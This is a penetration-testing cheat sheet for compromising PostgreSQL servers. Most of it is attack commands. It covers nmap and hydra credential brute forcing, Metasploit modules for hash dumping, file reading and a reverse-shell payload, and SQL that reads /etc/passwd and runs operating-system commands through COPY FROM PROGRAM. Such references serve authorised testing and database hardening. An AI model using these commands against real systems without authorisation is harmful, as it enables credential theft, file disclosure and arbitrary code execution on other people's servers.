PostgreSQL is an open source database which can be found mostly in Linux operating systems. However it has great compatibility with multiple operating systems and it can run in Windows and MacOS platforms as well. If the database is not properly configured and credentials have been obtained then it is possible to perform various activities like read and write system files and execution of arbitrary code.

Enumeration

Nmap

Version disclosure

Use nmap -sV -p 5432 10.0.0.1

Bruteforce credentials:

nmap -p 5432 --script pgsql-brute

Metasploit

Version disclosure

auxiliary/scanner/postgres/postgres_version

Bruteforce login:

auxiliary/scanner/postgres/postgres_login

Dump scheme:

auxiliary/scanner/postgres/postgres_schemadump

Database enumeration:

auxiliary/admin/postgres/postgres_sql

Hashdump:

auxiliary/scanner/postgres/postgres_hashdump

Read files:

auxiliary/admin/postgres/postgres_readfile

Reverse shell

exploit/linux/postgres/postgres_payload

Login

Login using psql:

psql -h 192.168.100.11 -U postgres

Common/default credentials

Bruteforce login credentials:

hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.120 postgres

Commands

Command execution

PostgreSQL databases can interact with the underlying operating by allowing the database administrator to execute various database commands and retrieve output from the system.

Run:

postgres=# select pg_ls_dir('./');

By executing the following command it is possible to read server side postgres files.

postgres=# select pg_read_file('PG_VERSION', 0, 200);

It is also possible to create a database table in order to store and view contents of a file that exist in the host.

postgres-# CREATE TABLE temp(t TEXT); 
postgres-# COPY temp FROM '/etc/passwd'; 
postgres-# SELECT * FROM temp; 

OR use the metasploit module

Auxiliary/admin/postgres/postgres_readfile

Execute command

CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'sudo -l';
SELECT * FROM cmd_exec;